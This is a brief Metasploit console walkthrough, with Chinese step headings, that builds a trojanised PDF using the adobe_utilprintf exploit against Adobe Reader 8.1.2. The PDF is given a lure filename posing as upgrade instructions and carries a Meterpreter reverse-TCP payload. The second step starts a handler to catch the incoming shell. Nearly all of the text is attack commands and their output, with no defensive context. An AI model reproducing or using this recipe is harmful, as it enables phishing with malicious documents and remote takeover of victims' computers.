一:生成pdf木马 
msf > use exploit/windows/fileformat/adobe_utilprintf 
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf 
FILENAME => BestComputers-UpgradeInstructions.pdf 
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 
LHOST => 192.168.8.128 
msf exploit(adobe_utilprintf) > set LPORT 4455 
LPORT => 4455 
msf exploit(adobe_utilprintf) > show options 
 
Module options (exploit/windows/fileformat/adobe_utilprintf): 
 
   Name      Current Setting                        Required  Description 
   ----      ---------------                        --------  ----------- 
   FILENAME  BestComputers-UpgradeInstructions.pdf  yes       The file name. 
 
 
Payload options (windows/meterpreter/reverse_tcp): 
 
   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) 
   LHOST     192.168.8.128    yes       The listen address 
   LPORT     4455             yes       The listen port 
 
 
Exploit target: 
 
   Id  Name 
   --  ---- 
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)
  |  
  
 |  
  
 
  
二:开始攻击 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LPORT 4455 
LPORT => 4455 
msf exploit(handler) > set LHOST 192.168.8.128 
LHOST => 192.168.8.128 
msf exploit(handler) > exploit 
 
[*] Handler binding to LHOST 0.0.0.0 
[*] Started reverse handler 
[*] Starting the payload handler...
  
 
  
 |